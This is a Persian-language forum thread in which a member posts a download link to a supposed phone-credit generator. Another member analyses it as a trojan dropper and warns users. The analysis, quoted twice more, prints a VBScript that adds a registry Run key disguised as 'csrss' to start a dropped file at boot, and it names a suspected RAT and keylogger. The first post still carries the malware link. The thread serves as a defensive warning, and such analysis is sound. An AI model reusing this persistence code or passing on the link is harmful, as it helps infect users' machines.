پرش به


تصویر
  • لطفا وارد حساب کاربری خود شوید تا بتوانید پاسخ دهید
5 پاسخ برای این موضوع

#1 ارسالی 09 آوریل 2015 - 12:11

    OFFLINE
    تاریخ عضویت :
    05 مارس 2015
  • %100██████████
  • Anonymous
  • 170 ارسال
    Last Visit اكتبر 13 2016 09:52
  • Slogan : آنایوردوم آذربایجان
  • Country :
  • Gender : Male
  • Location : tabriz
  • Name : mortaza

با سلام

 

اینم برنامه ی شارز ساز

 

لینک دانلود:http://uplod.ir/csxo...imba.ir.rar.htm

 

یا علی


:rolleyes:افـــــتخار میکنم ترکـــــــــــم که تو همه جا نقش داشت و خواهد داشت :x B)


#2 ارسالی 09 آوریل 2015 - 07:49

rising
+417
    OFFLINE
    تاریخ عضویت :
    19 مارس 2015
  • استاد هک و امنیت شبکه
  • Anonymous
  • 94 ارسال
    Last Visit ژوئن 16 2016 09:52
  • Slogan : شانسم رو خودم میسازم
  • Country :
  • Gender : Male
  • Location : کرج

همه ی کاربرا توجه کنن.

من این برنامه رو اومدم قبل از اینکه اجراش کنم روی یه سیستم عامل مجازی ساز آنالیزش کردم

 

نتیجه ی آنالیز:

به این برنامه ای که داده یه فایل بایند شده به اسم MuFl3h.exe .خوده این فایل بایند شده سه تا دیگه فایل محتویاتش هست.

وقتی که من با الی دی باگ بازش کردم دیدم که اسماشون اینا هستش

scan.exe

remnants.exe
xlon.vbs

 

این تا اینجا

فایل اصلی رو که اجراش کنین اون دو تا فایل اولی که گفتم اینجا کپی میشن

C:\Users\AppData\Local\Temp\remnants.exe

C:\Users\AppData\Local\Temp\scan.exe

 

 

اون فایل vbs هم که وجود داره من خودم شخصا قبلا از اینجور فایل ها ایجاد میکردم که به صورت اتوماتیک سرور رو کپی کنه تو استارتاپ سیستم شما

این فایل رو من سورس کدهاش رو باز کردم این محتویات داخلش بود:

 

Dim strComputer, ArrOfValue, oReg , username

Set objNet = CreateObject("WScript.NetWork")
username=objNet.Username
Dim objShell
Set objShell = CreateObject("WScript.Shell")


const HKEY_USERS = &H80000003
const HKEY_LOCAL_MACHINE = &H80000002
const HKEY_CURRENT_USER = &H80000001
const HKEY_CLASSES_ROOT = &H80000000
strComputer = "."
Set oReg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" & strComputer & "\root\default:StdRegProv")
objShell.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Run\csrss", "C:\Users\" & username & "\AppData\Local\Temp\scan.exe", "REG_SZ"
Set objShell = Nothing
WScript.Quit

 

سروراشم فکر کنم دوتاست.یا رت هستش یا دارک کامت اون یکیشم که Keyspy هستش.

بعد از اجرای فایل scan.exe
بعد چن ثانیه یه پروسس دیگه میاد جاش به نام server.exe
من اونو ایند پروسس کردم ولی هنگام بستن پروسس یه پیام داد که باید پی سی ریستارت بشه تا این پروسس بسته شه.
بعد اون وقتی pc بالا میاد ، 3 تا فایل تو استارتاپ میان که نام هاشون به صورت عددی هست.

 

زبان برنامه نویسی remnants.exe دات نت بودش.

فایل scan.exe هم مشخص نبود

 

در نهایت آقای مرتضی تکاور اومده این برنامه ی مخرب رو گذاشته تو ی این انجمن.

 

بعد از هماهنگی با تیم مدیریت کل مطمعن باشید که ایشون به احتمال زیاد از انجمن اخراج خواهد شد.

 

 

در صورت داشتن فرصت ، بقیه نرم افزار هایی رو هم که بقیه دوستان قرار دادن چک میکنم.


آموزش کامل متاسپلویت

بچه ها فقط مصرف کننده ی مطالب نباشین !!!

ما اینجا یه گروه هستیم ، همدیگه رو اینجا ملاقات میکنیم که دانستنی هامون رو به اشتراک بذاریم ;)


#3 ارسالی 10 آوریل 2015 - 01:38

LeChO
+1
    OFFLINE
    تاریخ عضویت :
    06 مارس 2015
  • %0▒▒▒▒▒▒▒▒▒▒
  • Anonymous
  • 8 ارسال
    Last Visit آوریل 17 2015 09:35
  • Slogan : mano to
  • Gender : Male
  • Location : tabriz

همه ی کاربرا توجه کنن.

من این برنامه رو اومدم قبل از اینکه اجراش کنم روی یه سیستم عامل مجازی ساز آنالیزش کردم

 

نتیجه ی آنالیز:

به این برنامه ای که داده یه فایل بایند شده به اسم MuFl3h.exe .خوده این فایل بایند شده سه تا دیگه فایل محتویاتش هست.

وقتی که من با الی دی باگ بازش کردم دیدم که اسماشون اینا هستش

scan.exe

remnants.exe
xlon.vbs

 

این تا اینجا

فایل اصلی رو که اجراش کنین اون دو تا فایل اولی که گفتم اینجا کپی میشن

C:\Users\AppData\Local\Temp\remnants.exe

C:\Users\AppData\Local\Temp\scan.exe

 

 

اون فایل vbs هم که وجود داره من خودم شخصا قبلا از اینجور فایل ها ایجاد میکردم که به صورت اتوماتیک سرور رو کپی کنه تو استارتاپ سیستم شما

این فایل رو من سورس کدهاش رو باز کردم این محتویات داخلش بود:

 

Dim strComputer, ArrOfValue, oReg , username

Set objNet = CreateObject("WScript.NetWork")
username=objNet.Username
Dim objShell
Set objShell = CreateObject("WScript.Shell")


const HKEY_USERS = &H80000003
const HKEY_LOCAL_MACHINE = &H80000002
const HKEY_CURRENT_USER = &H80000001
const HKEY_CLASSES_ROOT = &H80000000
strComputer = "."
Set oReg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" & strComputer & "\root\default:StdRegProv")
objShell.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Run\csrss", "C:\Users\" & username & "\AppData\Local\Temp\scan.exe", "REG_SZ"
Set objShell = Nothing
WScript.Quit

 

سروراشم فکر کنم دوتاست.یا رت هستش یا دارک کامت اون یکیشم که Keyspy هستش.

بعد از اجرای فایل scan.exe
بعد چن ثانیه یه پروسس دیگه میاد جاش به نام server.exe
من اونو ایند پروسس کردم ولی هنگام بستن پروسس یه پیام داد که باید پی سی ریستارت بشه تا این پروسس بسته شه.
بعد اون وقتی pc بالا میاد ، 3 تا فایل تو استارتاپ میان که نام هاشون به صورت عددی هست.

 

زبان برنامه نویسی remnants.exe دات نت بودش.

فایل scan.exe هم مشخص نبود

 

در نهایت آقای مرتضی تکاور اومده این برنامه ی مخرب رو گذاشته تو ی این انجمن.

 

بعد از هماهنگی با تیم مدیریت کل مطمعن باشید که ایشون به احتمال زیاد از انجمن اخراج خواهد شد.

 

 

در صورت داشتن فرصت ، بقیه نرم افزار هایی رو هم که بقیه دوستان قرار دادن چک میکنم.

 

 

الان ما این شارژ هارو بزنیم کار میکنند یا نه؟؟؟؟



#4 ارسالی 10 آوریل 2015 - 01:44

GHoST
+633
    OFFLINE
    تاریخ عضویت :
    27 فوریه 2015
  • شبح
  • Anonymous
  • 290 ارسال
    Last Visit ژوئن 25 2016 01:50
  • Slogan : ♠♣NeVeR BaCK DoWN♣♠
  • Country :
  • Gender : Male
  • Location : IRAN . TABRIZ

 

همه ی کاربرا توجه کنن.

من این برنامه رو اومدم قبل از اینکه اجراش کنم روی یه سیستم عامل مجازی ساز آنالیزش کردم

 

نتیجه ی آنالیز:

به این برنامه ای که داده یه فایل بایند شده به اسم MuFl3h.exe .خوده این فایل بایند شده سه تا دیگه فایل محتویاتش هست.

وقتی که من با الی دی باگ بازش کردم دیدم که اسماشون اینا هستش

scan.exe

remnants.exe
xlon.vbs

 

این تا اینجا

فایل اصلی رو که اجراش کنین اون دو تا فایل اولی که گفتم اینجا کپی میشن

C:\Users\AppData\Local\Temp\remnants.exe

C:\Users\AppData\Local\Temp\scan.exe

 

 

اون فایل vbs هم که وجود داره من خودم شخصا قبلا از اینجور فایل ها ایجاد میکردم که به صورت اتوماتیک سرور رو کپی کنه تو استارتاپ سیستم شما

این فایل رو من سورس کدهاش رو باز کردم این محتویات داخلش بود:

 

Dim strComputer, ArrOfValue, oReg , username

Set objNet = CreateObject("WScript.NetWork")
username=objNet.Username
Dim objShell
Set objShell = CreateObject("WScript.Shell")


const HKEY_USERS = &H80000003
const HKEY_LOCAL_MACHINE = &H80000002
const HKEY_CURRENT_USER = &H80000001
const HKEY_CLASSES_ROOT = &H80000000
strComputer = "."
Set oReg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" & strComputer & "\root\default:StdRegProv")
objShell.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Run\csrss", "C:\Users\" & username & "\AppData\Local\Temp\scan.exe", "REG_SZ"
Set objShell = Nothing
WScript.Quit

 

سروراشم فکر کنم دوتاست.یا رت هستش یا دارک کامت اون یکیشم که Keyspy هستش.

بعد از اجرای فایل scan.exe
بعد چن ثانیه یه پروسس دیگه میاد جاش به نام server.exe
من اونو ایند پروسس کردم ولی هنگام بستن پروسس یه پیام داد که باید پی سی ریستارت بشه تا این پروسس بسته شه.
بعد اون وقتی pc بالا میاد ، 3 تا فایل تو استارتاپ میان که نام هاشون به صورت عددی هست.

 

زبان برنامه نویسی remnants.exe دات نت بودش.

فایل scan.exe هم مشخص نبود

 

در نهایت آقای مرتضی تکاور اومده این برنامه ی مخرب رو گذاشته تو ی این انجمن.

 

بعد از هماهنگی با تیم مدیریت کل مطمعن باشید که ایشون به احتمال زیاد از انجمن اخراج خواهد شد.

 

 

در صورت داشتن فرصت ، بقیه نرم افزار هایی رو هم که بقیه دوستان قرار دادن چک میکنم.

 

 

الان ما این شارژ هارو بزنیم کار میکنند یا نه؟؟؟؟

 

دوست عزیز فرمایشات مهندس خوب بخونید متوجه میشین که این ی بد افزاره!!!!

و از دانلودش خودداری کنید


تصویر


تصویر


ANONYMOUS

JUST SECURITY

WE LOVE IRAN


NEVER BACK DOWN







ANONYMOUS

#5 ارسالی 10 آوریل 2015 - 11:15

Sara312
+0
    OFFLINE
    تاریخ عضویت :
    09 آوریل 2015
  • %0▒▒▒▒▒▒▒▒▒▒
  • Anonymous
  • 1 ارسال
    Last Visit آوریل 15 2015 10:43
  • Gender : Female



#6 ارسالی 11 آوریل 2015 - 12:34

Mr.Khatar
+5,380
    OFFLINE
    تاریخ عضویت :
    23 فوریه 2015
  • Anonymous
  • Leaders
  • 1,597 ارسال
    Last Visit
  • Slogan : Hello Security
  • Country :
  • Gender : Male
  • Location : Security City
  • Name : who am i

دوستان اقا مرتضی اطلاعی در این مورد نداشتن خودشون هم یکی از قربانی های این اتفاق هستن

 

به هر حال سلب درجه شدن

 

امیدوارم دوباره چنین مشکلی پیش نیاد

 

هکران ناشناس همچنان خواهان اسایش و رفاه شما هستن :x


We Are Iranian Aonymous

 

:biggrin:

 

Google is a Game For Us





0 کاربر در حال خواندن این موضوع است

0 کاربر، 0 مهمان و 0 عضو مخفی

رفتن به اول صفحه | Back To UP